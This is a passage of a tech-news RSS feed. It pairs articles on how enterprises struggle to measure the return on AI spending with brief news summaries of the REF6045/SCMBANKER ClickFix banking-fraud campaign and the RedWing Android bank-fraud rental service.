<p>“You don’t want to lay people off,” Bova says. “These are highly technical, hard-to-find talent. Maybe we want to think about redistributing teams a bit.”</p>



<p>Today, the company has several hundred AI agents in active deployment, tagged inside the digital twin infrastructure so they can be identified.</p>



<p>“If something screws up, we know exactly where to fix it,” she says, adding that the next phase is multi-agent orchestration. “Today, we have them connected, but we don’t have agents of agents.”</p>



<p>It’s too early to say if there’s ROI yet because, for drug development, the process takes years. “But by looking at the end-to-end process, my hope is we’ll find two years of cycle time to engineer out,” she says. “Two years quicker to market, compared to where we are now.”</p>



<p>Drugs that are already in the final phase of development won’t see as much acceleration, but those just starting out will benefit the most. The bottom line results, however, won’t show up for several years.</p>



<p>The pharmaceutical industry isn’t the only one where true value comes from optimizing multiple interconnected processes at once. <a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html" rel="nofollow">According to PwC</a>, tactical AI projects often don’t deliver measurable value, with tangible returns coming from enterprise-scale deployments consistent with business strategy.</p>



<p>In fact, many companies have seen neither increased revenue nor decreased costs from AI in the last 12 months despite nearly universal adoption of AI. Still, enterprise spending on AI is set to nearly double by the end of the year compared to last year, according to <a href="https://kpmg.com/us/en/media/news/q1-ai-pulse2026.html" rel="nofollow">KPMG</a>.</p>



<h2 class="wp-block-heading">Productivity measurement</h2>



<p>Most companies start on a smaller scale, rolling out AI chatbots to employees to help improve productivity. And the pace of adoption here has been staggeringly high, matched only by a lack of ability to measure the productivity gains that are supposed to be achieved.</p>



<p>Having a baseline is key, says Anand Rao, professor of AI at Carnegie Mellon University, but it’s difficult to measure in some cases, and all but impossible in others. Take for example insurance decisions where results can take years to show up. With life insurance, it could be decades, he says. And for some types of decisions, companies don’t have any measurements at all.</p>



<p>“There’s a social stigma to saying that I’m trying to look at your decision-making and how well you’re making the decisions,” he says. “As humans, we don’t like to be measured for our decisions.”</p>



<p>Then, when a decision turns out well in the end, people are happy to take credit. “If the decision goes badly, it’s something outside,” he says.</p>



<p>But even for specific tasks where measurement is possible, companies often don’t put in the work to make the measurements prior to rolling out AI tools. “We didn’t start with a baseline,” says Julie Averill, former EVP and global CIO of fashion retailer Lululemon. Averill is now CEO at Gold Thread, a digital transformation consultancy.</p>



<p>“We started with the assumption that AI was going to help people make better decisions,” she says. “And that sets you up to not being able to measure well.”</p>



<p>There are alternative metrics that a company can look at instead, she adds, like usage rates or user satisfaction. “This is happening, and it’s bringing benefits,” she says, “some of which you can see, and some you can’t. You have to trust the process. It’s just like the cloud. You know it’s the way of the future and you can see the benefits, but it’s hard to get there, and there’s a lot of change required. But the sooner you do that, the sooner you’re in the new way of operating and can really take advantage of it.”</p>



<p>There are other areas where hard metrics are more readily available, like customer service. “These are repeatable tasks, and it’s usually the first place companies automate with AI,” Averill says. “There are very tangible results you can measure, and you can have a very good baseline.”</p>



<p>Lululemon has also been using AI for years for better personalization and recommendations, and that’s also an area that can be quantified. And automation can reduce manual data entry, reducing error rates. AI can also be used to help with compliance monitoring, fraud detection, and predictive maintenance for equipment, which are all use cases that can be quantified.</p>



<p>But employee productivity in general? That’s a tough one to measure, and not just for Lululemon. One obvious way might be to look at layoffs in professions exposed to AI. After all, the headlines are everywhere. But in <a href="https://www.anthropic.com/research/labor-market-impacts" rel="nofollow">a report released in March</a>, Anthropic found no signs of an increase in unemployment in highly exposed professions, those in which people are most likely to be laid off due to AI.</p>



<p>In early 2025, research firm METR attempted to quantify developer productivity by comparing how fast experienced developers were able to achieve tasks with AI and without. The result? Developers said they were expecting AI to speed them up by 24%, and estimated that AI had actually sped them up by 20%. But the data showed an altogether different story. Their use of AI actually slowed them down by 19%.</p>



<p>Of course, AI tools are getting better. METR attempted to do a follow-up study, again tracking tasks done with and without AI, but they couldn’t find enough developers willing to go back to the no-AI approach, even though the researchers were paying them to participate in the study.</p>



<p>There are anecdotal reports of companies where one engineer does the work of a hundred by using AI. Or that time the entire half-million-line Claude Code codebase was accidentally leaked and Korean developer Sigrid Jin created a clean-room rebuild in two hours, which he then pushed to GitHub, where it became the fastest project in history to hit 100,000 stars.</p>



<p>But as with anything else having to do with AI, the real picture is more complicated. With software development in particular, typing the code is actually just a fraction of what’s involved in developing software.</p>



<p>Research firm DX recently analyzed key engineering metrics from 400 companies, and in a recent report found that AI usage increased by 65% since November 2024, but AI-related productivity was just under 10%.</p>



<h2 class="wp-block-heading">Hidden costs</h2>



<p>Just as it’s difficult to measure the productivity benefits of AI, it can also be tricky to measure the costs. When a company first starts using AI, costs might be relatively simple to estimate. What’s the total monthly subscription charges for the AI chatbots that employees are using? What’s the cost of training or fine-tuning a custom model? But when you move on to more complex use cases, the calculations get more difficult, says Averill.</p>



<p>“Now there are all the systems around the AI,” she says. “Those are harder to measure, but the impact is bigger.”</p>



<p>For example, if AI is embedded into business processes using RAG, there’s the ongoing expense of the API calls, but also the changes that need to be made to other systems, she says. And it just keeps getting more complicated every day.</p>



<p>“We haven’t taken a very concerted effort to putting telemetry and instrumentation in place,” says Swaminathan Chandrasekaran, global head of AI and data labs at KPMG. He says that getting a comprehensive picture of the total costs of AI in an enterprise is like predicting the weather.</p>



<p>“The reason we have a pretty awesome weather prediction system in this country is because we have tens of thousands of weather stations that aggregate data,” he says. “Without that, we wouldn’t know the weather.”</p>



<p>Companies need to set up instrumentation to measure all the aspects of AI-related consumption, he says, starting with the number of tokens used, who’s using them, and how it correlates to work output.</p>



<p>“That measurement is fundamentally lacking,” he says.</p>



<p>At least when humans are using AI chatbots, there’s a limit to how many questions they’re physically able to ask, combined with predictable subscription costs. And when business processes are AI-enabled via RAG, the API calls to LLMs are being made by predictable, traditionally-scripted business systems.</p>



<p>But now, agentic AI is making everything worse because the agents can act unpredictably, and the number of API calls can quickly spiral out of control. In a report by the <a href="https://www.bcg.com/publications/2026/how-leaders-build-an-ai-first-cost-advantage" rel="nofollow">Boston Consulting Group</a>, two-thirds of companies are reporting uncontrollable AI scaling expenses.</p>



<p>Another cost some companies might not anticipate well, or not track because it’s part of a different budget, is data-related cost. Whether preparing data for training or fine-tuning, using RAG embeddings, or setting up direct MCP access via agents, these costs can quickly add up when AI comes into the picture.</p>



<p>“Egress fees are one of the big ones,” says Tom Coughlin, IEEE fellow and president of consulting firm Coughlin Associates. “If you have to bring data out of the cloud, those egress fees could be considerable.”</p>



<p>Then there are all the <a href="https://www.cio.com/article/4152626/organizations-often-dont-measure-the-cost-of-it-inefficiency-but-it-can-be-huge.html?utm=hybrid_search">human costs of deploying AI</a>, he adds.</p>



<p>“There’ll be a lot of value that people get out of AI in the long run, but they need to know how to use it properly,” he says. “If they don’t have those skills, you’ll be at a disadvantage.”</p>



<h2 class="wp-block-heading">Solutions and mixed messages</h2>



<p>Then there’s fixing problems. A majority of companies have had at least one AI-related incident in the last 18 months, with most resulting in financial loss, some over $500,000. Then there’s the AI that’s being embedded in everything.</p>



<p>“We know our direct costs,” says Andrew Johnson, CIO at Brownstein Hyatt Farber Schreck, a leading national law firm. “But where it becomes more difficult to measure is with platforms we already have in place, and SaaS applications that didn’t have AI capabilities,” he says. “They’re asking for extraordinary increases and attribute them to new capabilities due to AI. How much should be ascribed to AI? That’s a little wishy-washy.”</p>



<p>Even when AI saves money, there are often extra costs associated with that. For example, the firm was spending about $70,000 a year on a contract management platform. Building their own version with AI took about $40,000 in labor costs and another $3,000 a year for hosting. Ongoing maintenance will be minor for that particular application, he adds, totaling another couple of thousand a year.</p>



<p>But there are also other indirect costs that come with running your own applications, including security audits, vulnerability assessments, penetration tests, and code review.</p>



<p>“The more complex and riskier the platform, the less appetite there is for trying to create an in-house solution,” he says.</p>



<p>Still, the software development team is now dramatically more productive as a result of AI, with four or five developers able to do the work of 20 or 30.</p>



<p>But the productivity improvements don’t translate to labor savings, since there’s plenty of new work for the developers to do. “We have an enormous backlog of opportunities to develop solutions,” he says.</p>



<p>The tendency of work to expand to fill the time available isn’t just true for software development, says Carnegie Mellon’s Rao.</p>



<p>Say for example, AI is expected to lead to a 20% improvement in productivity, he says. “There were a hundred people doing it, and now we only need 80.” But at the end of the year, headcount hasn’t changed. “The tasks they were doing, there’s improvement,” he adds “But humans will add tasks to supplement or complement that 20%. It’s not that they’re going home an hour early, but they’re finding other value-generating activities.”</p>



<p>In fact, in some cases, increased productivity at a company can actually hurt the bottom line. Lawyers, for example, bill by the hour.</p>



<p>“Efficiency runs counter to our traditional ways of making money,” says Brownstein’s Johnson. “We have to think past that. It’s not detrimental to our long-term interest, but it’s a challenge in the short term. If we don’t do this, though, it’s likely we won’t be competitive in the mid- to long-term.”</p>



<p>So if a new AI tool helps an attorney with due diligence, there’s no straight line between the investment in that tool and increased revenues.</p>



<p>“It’s a given that it’s directionally right,” Johnson says. “But we can’t say it’s going to lead to a particular return.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers]]></title>
<description><![CDATA[A human-operated Mexican banking fraud campaign tracked as REF6045 has been observed using a bespoke PowerShell toolkit SCMBANKER to turn commodity click-fraud lures into operator-assisted account takeovers and payment diversion. The operation relies on social engineering through fake CAPTCHA/ver...]]></description>
<link>https://tsecurity.de/de/3653803/it-security-nachrichten/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653803/it-security-nachrichten/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/</guid>
<pubDate>Wed, 08 Jul 2026 11:23:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A human-operated Mexican banking fraud campaign tracked as REF6045 has been observed using a bespoke PowerShell toolkit SCMBANKER to turn commodity click-fraud lures into operator-assisted account takeovers and payment diversion. The operation relies on social engineering through fake CAPTCHA/verification pages…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/">REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI ROI gap isn’t a model problem. It’s a workflow problem]]></title>
<description><![CDATA[Anthropic says Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s 2026 State of the CIO study says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came o...]]></description>
<link>https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</guid>
<pubDate>Wed, 08 Jul 2026 11:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.anthropic.com/institute/recursive-self-improvement" rel="nofollow">Anthropic says</a> Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">2026 State of the CIO study</a> says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came out this spring. Both are true. And the distance between them is the most important thing an IT leader can understand about AI right now.</p>



<p>Because that distance isn’t a contradiction, it’s a lesson. And the profession sitting in the middle of it, software engineering, is the canary that explains why so much enterprise AI spend has produced so little measurable return.</p>



<h2 class="wp-block-heading">The report everyone misread</h2>



<p>When Anthropic published its recursive self-improvement piece, plenty of people read it as the starting gun for the job apocalypse. Claude writing its own code, models getting better at building models, humans narrowing toward oversight. If you wanted a headline about the end of the software profession, it was right there.</p>



<p>I read it almost the opposite way. What struck me wasn’t how far AI had come. It was how much had to be true first, even in the one profession built from the ground up to let it succeed.</p>



<p>I made this argument back in my <a href="https://www.cio.com/article/4166029/the-570k-canary-what-ai-coding-agents-reveal-about-enterprise-ais-real-gaps.html">“$570K canary” piece</a>, and the Anthropic data only sharpens it. AI coding agents don’t work because coding models are special. The underlying large language models (LLMs) are the same ones answering support tickets and reviewing contracts. They work because software development already had the infrastructure that makes an agent’s output trustworthy: governance baked into branch protection and code review, observability through version control and CI/CD pipelines, evaluation through automated tests, persistent context through commit history. Developers built all of that for themselves over decades. They didn’t build it for AI. But it turned out to be exactly the scaffolding AI needed.</p>



<p>That’s the part the apocalypse reading skips. Claude’s coding gains are real. They also rode on decades of pre-built substrate. Both things are true at once, and the second one is the one CIOs should be paying attention to when it comes to gains from things like recursive self-improvement.</p>



<h2 class="wp-block-heading">What the CIO data actually shows</h2>



<p>Now hold that next to the State of the CIO numbers. Only 19% of the 662 IT leaders surveyed say their AI initiatives have met or exceeded business goals. Another 18% admit fewer than a third of their use cases are hitting defined expectations.</p>



<p>The easy explanation is that the technology isn’t ready. The data says otherwise. This isn’t for lack of trying, and it isn’t for lack of organizing. Eighty-three percent of respondents have stood up cross-functional steering committees or are about to. Just over half have some form of AI approval process in place, with another quarter building one. Forty-seven percent have formal success metrics, with a third more on the way. The field is pouring effort into the organizational machinery of AI. The ROI still isn’t showing up.</p>



<p>Here’s why I think that is. All of that machinery sits above the work. Steering committees, approval gates and KPI dashboards govern the org chart. But the value, or the leak, happens inside the workflow, at the level of the actual task the AI is doing. You can instrument your governance structure perfectly and still have nothing measuring whether the agent’s output was right at the point where it mattered.</p>



<p>TIAA shows how little the org chart settles. The firm is three years in, runs generative and agentic use cases across fraud detection and call centers, and has 85% of its people on TIAA Gate, its internal platform. It also has the full governance stack most CIOs are still assembling. None of it closed the gap. “You need to understand the full cost of operations,” its chief operating, information and digital officer, Sastry Durvasula told CIO.com, “the efficiencies of running tokens or how you’re handling traffic or RAG.” The structures were never the thing leaking value. The workflow underneath them was.</p>



<p>The barriers respondents named back this up. The top three are lack of in-house expertise (40%), ill-defined ROI metrics (32%) and murky corporate AI strategy (31%). Not one of them is “the model isn’t good enough.” And according to the full Foundry report, the expertise gap is deepest in healthcare (52%), retail (51%) and manufacturing (49%), the sectors whose core work looks least like a software development lifecycle. That’s consistent with substrate being the real variable, though a tighter market for AI talent in those industries is surely part of the story too.</p>



<h2 class="wp-block-heading">The market is already voting</h2>



<p>Look at where the AI is actually being pointed, and you’ll see enterprises sequencing by substrate even though nobody’s calling it that. Three-quarters of both IT leaders and line-of-business respondents say AI is primarily being used to automate internal processes rather than customer-facing applications.</p>



<p>That’s not timidity. It’s instinct pointing at the right thing. Internal processes are the ones with structured, observable workflows and users who tolerate a little friction. Customer-facing work is where the trust gaps are still wide open and the cost of a wrong answer is asymmetric. A bad internal draft gets fixed before anyone sees it. A bad customer answer is the whole ballgame.</p>



<p>I’ll be honest about a wrinkle in the data here, because a careful reader will catch it. The same study reports a near-mirror finding, that 66% to 69% of respondents say the bulk of their current AI work is customer-facing. The two stats sit a paragraph apart in the CIO study and almost certainly reflect how the question was framed rather than a real reversal. But the synthesis holds either way: even where customer-facing work is being attempted, it’s where ROI is least realized. The work that lands is the work with the substrate underneath it. The split only reinforces the point.</p>



<h2 class="wp-block-heading">Sequence by readiness, not by ambition</h2>



<p>So, here’s the prescription, and it cuts against the instinct most AI strategies are built on. Stop sequencing your AI portfolio by where the value looks biggest. Start sequencing it by where the work already has, or can be given, a structured workflow with a usable signal for whether the output was right.</p>



<p>The study itself shows what the alternative looks like. Andrea Ballinger, CIO at Rensselaer Polytechnic Institute, described the trap precisely. No one measures ROI on an ongoing basis, she said, “because we are facing counterpressures from every vice president and line-of-business domain looking to implement AI for their own optimization.” The result: “We are saying yes to everyone without stepping back and focusing on the business cases that show real value.” That’s value-led sequencing under pressure from every budget-holder in the building, and it’s exactly how you end up with a sprawling pipeline of pilots and a 19% success rate.</p>



<p>The counterexample comes from the same study. Thomas Prommer, a longtime CTO, CIO and CAIO, funds outcomes instead of deliverables. “We don’t fund ‘build a model,’ we fund ‘reduce returns by 8% on this category’ with checkpoints at 90, 180 and 270 days,” he explained. He kills any project that misses two checkpoints, “roughly a third of what we start, and that’s healthy.” Read that through the substrate lens and you see what he’s really doing. He’s manufacturing a correctness signal where the work didn’t come with one. He’s building the missing piece of scaffolding by hand.</p>



<p>That gives you a simple lens to run any candidate use case through. Does the work break into discernible stages? Can you observe what happens at each one? Is there a usable signal for whether the result was right? Score high on all three and you have a software-engineering-shaped problem, so go now. Score low and you have a choice: build the substrate first or wait. What you shouldn’t do is fund it at scale and hope the ROI materializes, because that’s the pile the 19% number is built on.</p>



<h2 class="wp-block-heading">The hard part, and the honest caveat</h2>



<p>Run the professions through that lens and they sort themselves. Finance is the closest cousin to software. Reconciliation, close processes, approval chains and audit trails already give you staged work with a clear “it reconciles or it doesn’t” signal, which is part of why financial services sits among the sectors furthest along with AI. Legal and medicine are harder. The workflow shell exists, intake to redline to filing, diagnosis to treatment to follow-up, but the correctness signal at the core is weak, delayed or confounded. You can automate the routine staged parts and you hit a wall at the judgment that defines the profession.</p>



<p>And that’s the caveat that keeps this honest. A structured workflow isn’t always buildable in software’s image. For the judgment core of some professions, the substrate is years out no matter how good the model gets or how mature your governance becomes. Anyone selling you a tighter timeline than that is selling.</p>



<p>But notice what this reframe does. It turns “our AI ROI is elusive” from a mystery you wait out into a sequencing-and-instrumentation problem you can actually test. Your timeline isn’t set by how smart the next model is. It’s set by how fast you build the substrate for your own domain, and that’s within your control.</p>



<h2 class="wp-block-heading">The two numbers, reconciled</h2>



<p>Put the 80% and the 19% back next to each other and they stop looking like a paradox. Software engineering didn’t win because its models were better than everyone else’s. It won because the work was already shaped to let an agent succeed, and the scaffolding that makes agent output trustworthy had been in place for decades before the agent showed up.</p>



<p>The question for the rest of the enterprise was never really whether AI can do the work. It’s whether your work is shaped so AI’s output can be trusted. That’s not something you wait for. It’s something you build.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SCMBANKER Malware Turns ClickFix Pages Into Operator-Assisted Mexican Banking Fraud]]></title>
<description><![CDATA[A new Mexican banking fraud operation tracked as REF6045 is taking a highly hands-on approach to stealing financial data. Instead of relying on automated scripts, a human operator actively monitors infected machines using a PowerShell toolkit named SCMBANKER. The attack begins with fake CAPTCHA p...]]></description>
<link>https://tsecurity.de/de/3653697/it-security-nachrichten/scmbanker-malware-turns-clickfix-pages-into-operator-assisted-mexican-banking-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653697/it-security-nachrichten/scmbanker-malware-turns-clickfix-pages-into-operator-assisted-mexican-banking-fraud/</guid>
<pubDate>Wed, 08 Jul 2026 10:38:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new Mexican banking fraud operation tracked as REF6045 is taking a highly hands-on approach to stealing financial data. Instead of relying on automated scripts, a human operator actively monitors infected machines using a PowerShell toolkit named SCMBANKER. The attack begins with fake CAPTCHA pages that trick victims into copying and pasting a malicious command. […]</p>
<p>The post <a href="https://cyberpress.org/clickfix-powers-mexican-fraud/">SCMBANKER Malware Turns ClickFix Pages Into Operator-Assisted Mexican Banking Fraud</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers]]></title>
<description><![CDATA[A human-operated Mexican banking fraud campaign tracked as REF6045 has been observed using a bespoke PowerShell toolkit SCMBANKER to turn commodity click-fraud lures into operator-assisted account takeovers and payment diversion. The operation relies on social engineering through fake CAPTCHA/ver...]]></description>
<link>https://tsecurity.de/de/3653618/it-security-nachrichten/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653618/it-security-nachrichten/ref6045-uses-scmbanker-powershell-toolkit-to-target-mexican-banking-customers/</guid>
<pubDate>Wed, 08 Jul 2026 10:07:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A human-operated Mexican banking fraud campaign tracked as REF6045 has been observed using a bespoke PowerShell toolkit SCMBANKER to turn commodity click-fraud lures into operator-assisted account takeovers and payment diversion. The operation relies on social engineering through fake CAPTCHA/verification pages that trick victims into running a single command from the Windows Run dialog. That command […]</p>
<p>The post <a href="https://gbhackers.com/ref6045-uses-scmbanker-powershell/">REF6045 Uses SCMBANKER PowerShell Toolkit to Target Mexican Banking Customers</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RedWing als Mietmodell: Android-Bankbetrug über Telegram]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neue Android-Malware namens RedWing wird als Mietservice über Telegram angeboten und verschafft auch unerfahrenen Tätern Zugriff auf die Kontositzung des Opfers. Das Paket täuscht Nutzer mit gefälschten App-Store-Seiten, baut bei Bedarf eine individuelle Installation u...]]></description>
<link>https://tsecurity.de/de/3652855/it-security-nachrichten/redwing-als-mietmodell-android-bankbetrug-ueber-telegram/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652855/it-security-nachrichten/redwing-als-mietmodell-android-bankbetrug-ueber-telegram/</guid>
<pubDate>Wed, 08 Jul 2026 00:20:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-1-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neue Android-Malware namens RedWing wird als Mietservice über Telegram angeboten und verschafft auch unerfahrenen Tätern Zugriff auf die Kontositzung des Opfers. Das Paket täuscht Nutzer mit gefälschten App-Store-Seiten, baut bei Bedarf eine individuelle Installation und missbraucht anschließend Barrierefreiheitsrechte für Bildschirmlese und Fernsteuerung. Besonders kritisch: RedWing kann Einmalcodes (OTP) auslesen, Login- […]</p>
<div><a href="https://www.it-boltwise.de/redwing-als-mietmodell-android-bankbetrug-ueber-telegram.html">... den vollständigen Artikel <strong>»RedWing als Mietmodell: Android-Bankbetrug über Telegram«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/redwing-als-mietmodell-android-bankbetrug-ueber-telegram.html">RedWing als Mietmodell: Android-Bankbetrug über Telegram</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix to Cash-Out: Anatomy of a Mexican Banking-Fraud Toolkit]]></title>
<description><![CDATA[Elastic Security Labs tracks REF6045, an active operator-assisted banking fraud operation targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges.]]></description>
<link>https://tsecurity.de/de/3652816/it-security-nachrichten/clickfix-to-cash-out-anatomy-of-a-mexican-banking-fraud-toolkit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652816/it-security-nachrichten/clickfix-to-cash-out-anatomy-of-a-mexican-banking-fraud-toolkit/</guid>
<pubDate>Tue, 07 Jul 2026 23:53:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elastic Security Labs tracks REF6045, an active operator-assisted banking fraud operation targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges.]]></content:encoded>
</item>
<item>
<title><![CDATA[RedWing als Telegram-Mietmodell: Android-Bankbetrug ohne Exploit]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – RedWing wird offenbar als fertiges Miet-Paket über Telegram angeboten: Käufer müssen keine Malware schreiben, sondern wählen Ziele, lassen die App maßschneidern und erhalten dazu Anleitungen. Technisch setzt das Setup auf Social Engineering beim App-Installationsvo...]]></description>
<link>https://tsecurity.de/de/3652506/it-security-nachrichten/redwing-als-telegram-mietmodell-android-bankbetrug-ohne-exploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652506/it-security-nachrichten/redwing-als-telegram-mietmodell-android-bankbetrug-ohne-exploit/</guid>
<pubDate>Tue, 07 Jul 2026 20:38:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-redwing-telegram-android-bank-fraud-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – RedWing wird offenbar als fertiges Miet-Paket über Telegram angeboten: Käufer müssen keine Malware schreiben, sondern wählen Ziele, lassen die App maßschneidern und erhalten dazu Anleitungen. Technisch setzt das Setup auf Social Engineering beim App-Installationsvorgang, nutzt dann missbrauchte Berechtigungen wie Accessibility und kann Einmalcodes direkt aus dem Screen abgreifen. Für […]</p>
<div><a href="https://www.it-boltwise.de/redwing-als-telegram-mietmodell-android-bankbetrug-ohne-exploit.html">... den vollständigen Artikel <strong>»RedWing als Telegram-Mietmodell: Android-Bankbetrug ohne Exploit«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/redwing-als-telegram-mietmodell-android-bankbetrug-ohne-exploit.html">RedWing als Telegram-Mietmodell: Android-Bankbetrug ohne Exploit</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RedWing MaaS Packages Android Bank Fraud as a Telegram Rental Service]]></title>
<description><![CDATA[A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim’s phone, steal their banking logins, and capture the one-time codes that protect their…
Read more →
The post RedWing MaaS Packages...]]></description>
<link>https://tsecurity.de/de/3652481/it-security-nachrichten/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652481/it-security-nachrichten/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/</guid>
<pubDate>Tue, 07 Jul 2026 20:21:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim’s phone, steal their banking logins, and capture the one-time codes that protect their…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/">RedWing MaaS Packages Android Bank Fraud as a Telegram Rental Service</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RedWing MaaS Packages Android Bank Fraud as a Telegram Rental Service]]></title>
<description><![CDATA[A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim's phone, steal their banking logins, and capture the one-time codes that protect their accounts.

Zimperium's zLabs, which found t...]]></description>
<link>https://tsecurity.de/de/3652444/it-security-nachrichten/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652444/it-security-nachrichten/redwing-maas-packages-android-bank-fraud-as-a-telegram-rental-service/</guid>
